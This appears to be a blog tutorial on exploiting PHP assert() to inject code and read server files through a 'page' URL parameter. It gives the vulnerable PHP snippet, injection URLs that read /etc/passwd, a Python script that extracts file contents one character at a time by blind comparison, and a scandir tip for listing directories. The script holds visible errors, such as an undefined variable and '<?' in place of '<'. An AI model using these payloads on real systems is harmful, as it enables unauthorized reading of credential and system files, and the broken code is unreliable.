i PHP assert() Vulnerable to Local File Inclusion – All things in moderation

PHP assert() Vulnerable to Local File Inclusion

PHP assert() Vulnerable to Local File Inclusion

Consider following url
http://example.com/inex.php/?page=home

The first thing I see when entering the site, that comes to mind is a LFI attack with “?page=” parameter. Now we should try input to some file we know like “index.php”, “/etc/passwd” to test this vulnerability.

http://example.com/inex.php/?page=../../../../../etc/passwd

Application Reply with message “Warning: assert(): Assertion “strpos(‘includes/’, ‘qwer’) === false && strlen(file_get_contents(“.passwd”)) == 0 && strpos(‘1.php’, ‘..’) === false” failed in /var/www/html/index.php on line 8”

-> This application using assert() function to do checks if assertion is FALSE.

The php code using by application like following:

<?php
if (isset($_GET['page'])) {
    $page = $_GET['page'];
} else {
    $page = "home";
}
$file = "includes/" . $page . ".php";
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!"); // vulnerable code!
>?

Let try inject some malicious code to read file’s contents by using blind technique.

http://example.com/inex.php/?page=’, ‘qwer’) === false && strlen(file_get_contents(“../../../../../etc/passwd”)) == 0 && strpos(‘1

-> Server response with a message like “Warning: assert(): Assertion “strpos(‘includes/’, ‘qwer’) === false && strlen(file_get_contents(“../../../../../etc/passwd”)) == 0 && strpos(‘1.php’, ‘..’) === false” failed in /var/www/html/index.php on line 8” when the condition is FALSE

http://example.com/inex.php//?page=’, ‘qwer’) === false && strlen(file_get_contents(“../../../../../etc/passwd”)) >0 && strpos(‘1

-> Server response with a message like “File does not exist” when the condition is TRUE

Server ruturn warning with message “Detected hacking attempt!” when condition is FALSE, and “File does not exist” if condition is TRUE

The python script to read file’s contents:

import base64
import string
import requests
import urllib

url = "http://example.com/index.php/"


def check(payload):
    params = urllib.urlencode({'page': payload})
    r = requests.get(url, params=params)
    return "Warning" not in r.text


base = "/', 'qwer') === false && %s && strpos(/'1"

def get_len(path):
    i = 10
    while True:
        payload = 'strlen(file_get_contents("%s")) <? %d' % (path, i)
        if check(base % s):
            for j in range(i-10, i):
                payload = 'strlen(file_get_contents("%s")) == %d' % (path, j)
                if check(base % payload):
                    print "Found Length = %d" % j
                    return j
        i += 10

def read_file_contents(path):
    length = get_len(path)
    s = ""
    while len(s) <? length:
        for c in string.printable:
            tmp = s + c
            payload = 'substr(file_get_contents("%s"), 0, %d) == base64_decode("%s")' % (
            path, len(tmp), base64.b64encode(tmp))

            if check(base % payload):
                s += c
    print s

print read_file_contents('../../../../../../etc/passwd')

With this vulnerability, you can read all directories and files in target server, first thing you should blind directory by using following code implode(” “, scandir(‘path_to_directory’)), this code implement to read directory and convert to string by implode() function.

One Response

  1. n00b August 21, 2018

Leave a Reply